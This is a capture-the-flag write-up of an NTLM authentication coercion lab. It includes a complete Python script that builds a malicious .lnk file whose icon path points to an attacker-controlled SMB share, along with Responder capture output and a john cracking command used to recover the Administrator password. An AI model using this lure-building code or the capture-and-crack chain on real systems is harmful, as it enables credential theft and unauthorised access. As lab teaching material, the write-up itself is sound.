Day 23

Coerced Authentication Relay All the Way

Learning Objectives

  • The basics of network file shares

  • Understanding NTLM authentication

  • How NTLM authentication coercion attacks work

  • How Responder works for authentication coercion attacks

  • Forcing authentication coercion using lnk files

This room is again a straightforward one: every command and instruction is given in the task text, so we only need to follow along and run them. The chain is Responder listening for coerced authentication, a malicious .lnk file dropped on a share to trigger it, and an offline crack of the captured NetNTLMv2 response.
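The learning objective about .lnk files is the part the room automates (the shell prompts below show the ntlm_theft checkout it was run from). The example below is added here and is not ntlm_theft's code or the room's: it builds a minimal Shell Link whose only payload is an IconLocation pointing at a UNC path, and parses it back for verification. When Explorer renders a folder containing the file it resolves the icon over SMB and authenticates to the named host, which is what Responder is waiting for; no click is needed. The attacker IP, share name and file name are assumptions.

```python
import struct

# ShellLinkHeader constants from MS-SHLLINK
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# StringData sections appear in this fixed order, each only if its flag is set
STRING_DATA_ORDER = (HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION)


def _string_data(s: str) -> bytes:
    # CountCharacters (uint16, characters not bytes) followed by UTF-16LE text, no terminator
    return struct.pack("<H", len(s)) + s.encode("utf-16le")


def build_icon_lnk(unc_icon_path: str, description: str = "") -> bytes:
    """Shortcut with no target at all; the IconLocation is the UNC path Explorer will fetch."""
    flags = HAS_ICON_LOCATION | IS_UNICODE | (HAS_NAME if description else 0)
    header = struct.pack(
        "<I16sIIQQQIIIHHII",
        76, LINK_CLSID, flags,
        0x20,        # FileAttributes: FILE_ATTRIBUTE_ARCHIVE, cosmetic
        0, 0, 0,     # creation / access / write FILETIME: unset
        0,           # FileSize
        0,           # IconIndex: first icon in the referenced file
        1,           # ShowCommand: SW_SHOWNORMAL
        0, 0, 0, 0,  # HotKey, Reserved1, Reserved2, Reserved3
    )
    string_data = (_string_data(description) if description else b"") + _string_data(unc_icon_path)
    terminal_block = struct.pack("<I", 0)  # ExtraData: TerminalBlock only
    return header + string_data + terminal_block


def read_icon_location(data: bytes):
    """Parse the IconLocation back out of a .lnk, skipping the sections that may precede it."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 76 or clsid != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:
        (link_info_size,) = struct.unpack_from("<I", data, pos)  # size includes the field itself
        pos += link_info_size
    unicode = bool(flags & IS_UNICODE)
    for flag in STRING_DATA_ORDER:
        if not flags & flag:
            continue
        (count,) = struct.unpack_from("<H", data, pos)
        pos += 2
        raw = data[pos:pos + (count * 2 if unicode else count)]
        pos += len(raw)
        if flag == HAS_ICON_LOCATION:
            return raw.decode("utf-16le" if unicode else "cp1252")
    return None


if __name__ == "__main__":
    # Assumed attacker host and share; drop the result on a share the victim browses
    lnk = build_icon_lnk(r"\\10.10.14.5\share\icon.ico", description="Budget 2023")
    with open("Budget 2023.lnk", "wb") as fh:
        fh.write(lnk)
    print(read_icon_location(lnk))
```

The file contains no target, command line or working directory, which is why it is the quiet variant: nothing runs on the victim, the only side effect is the SMB connection to the icon host. That also means it only works when the victim can reach that host on 445 and SMB to it is not blocked or forced through signing-aware relay defences; in the room the attacker is on the same VPN network, so the plain capture works.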

What is the name of the AD authentication protocol that makes use of tickets?
[REDACTED]
What is the name of the AD authentication protocol that makes use of the NTLM hash?
[REDACTED]
What is the name of the tool that can intercept these authentication challenges?
[REDACTED]
What is the password that McGreedy set for the Administrator account?
[REDACTED]

The password is recovered only after the NetNTLMv2 response has been captured with Responder: we save the hash line to a file and crack it offline with john against the provided wordlist (greedykeys.txt). Hydra is not involved; it is an online login brute-forcer, whereas this step is an offline crack of a captured challenge/response.

┌──(kali㉿kali)-[~]
└─$ sudo responder -I tun0   
[sudo] password for kali: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    .
    .
    .
[+] Current Session Variables:
    Responder Machine Name     [WIN-55XORMSS5HF]
    Responder Domain Name      [3ES2.LOCAL]
    Responder DCE-RPC Port     [46997]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.71.80
[SMB] NTLMv2-SSP Username : ELFHQSERVER\Administrator
[SMB] NTLMv2-SSP Hash     : [REDACTED]
[*] Skipping previously captured hash for ELFHQSERVER\Administrator
[*] Skipping previously captured hash for ELFHQSERVER\Administrator

┌──(kali㉿kali)-[~/Desktop/git/ntlm_theft/stealthy]
└─$ john --wordlist=greedykeys.txt hash.txt
Warning: detected hash type "netntlmv2", but the string is also recognized as "ntlmv2-opencl"
Use the "--format=ntlmv2-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED]
What is the value of the flag that is placed on the Administrator’s desktop?
[REDACTED]

We can either RDP into the machine with the username and password we found or connect with Evil-WinRM. The flag is on the Administrator's desktop.
